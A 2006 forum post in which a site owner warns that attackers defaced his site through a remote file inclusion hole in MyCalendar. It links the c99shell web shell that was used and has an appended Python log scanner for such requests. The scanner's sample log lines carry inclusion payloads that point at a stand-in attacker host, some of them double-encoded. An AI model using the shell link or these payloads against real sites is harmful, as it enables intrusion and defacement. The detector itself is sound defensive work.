Joined: 19 Apr 2006
Posted: Wed Apr 19, 2006 1:35 am Post subject: Hacker Exploit/Security Vulnerability in MyCalendar
I have been using MyCalendar for about a year now, and have had to remove it after a hacker group defaced one of my websites by exploiting a remote file inclusion vulnerability in MyCalendar to grant the attackers a web shell, allowing them to execute commands remotely.
Fortunately for me, these hackers just wanted to deface the home page and other points of entry, but they left all other files and data intact, and after I overwrote the pages they defaced with the originals I had backed up, all was well.
However, after consulting my webhost, we had to delete the MyCalendar program from the site and look for a more secure replacement. The Linux Administrator for my web host was able to find several other vulnerabilities with MyCalendar in just a matter of minutes.
They used this... http://svt.nukleon.us/tools/c99shell.txt?&cmd=u
If you go to that page you'll find the tool/code used to screw everything up on my site. Don't worry, it's just text/code on a page if you want to look at it.
Another thing to note, they could not delete files on my account, they were only able to rename the index.html and index.php files then insert index.htm files or recode the index.php files they wanted to deface.
Thought you and others might want to know about this before they install MyCalendar on their site, or if they already have the program they might want to try removing anything that says MyCalendar or any links to this site so that these hackers can't find their sites in web searches then deface them.
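Added example, not part of the original post and not MyCalendar code: a web-server log check for the kind of remote file inclusion request described above, where a query parameter carries an absolute URL such as the shell link quoted in the post. The path `/app/index.php`, the parameter name `page`, the host `attacker.example` and all log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: client IP, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A parameter value that is itself an absolute URL is the inclusion indicator.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (hypothetical path, parameter name and hosts).
SAMPLE_LOG = [
    '198.51.100.20 - - [19/Apr/2006:01:10:02 +0000] "GET /app/index.php?page=events&month=4 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [19/Apr/2006:01:12:44 +0000] "GET /app/index.php?page=http://attacker.example/shell.txt?&cmd=u HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Apr/2006:01:12:51 +0000] "GET /app/index.php?page=http%3A%2F%2Fattacker.example%2Fshell.txt%3F HTTP/1.1" 404 310',
    '203.0.113.9 - - [19/Apr/2006:01:13:05 +0000] "GET /app/index.php?page=%2568ttp%253A%252F%252Fattacker.example%252Fshell.txt HTTP/1.1" 200 5120',
]

def decode(value, rounds=2):
    """Undo up to `rounds` extra layers of percent-encoding (double encoding)."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def find_rfi_attempts(lines):
    """Return (client, path, param, remote_url, status) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        # parse_qsl already removes one layer of percent-encoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = decode(value)
            if REMOTE_RE.match(value):
                hits.append((client, parts.path, name, value, status))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A flagged request answered with status 200 deserves attention first, since the script that received it may have processed the remote URL. Legitimate parameters that carry URLs (redirect targets, for example) will also match and need to be allow-listed per application.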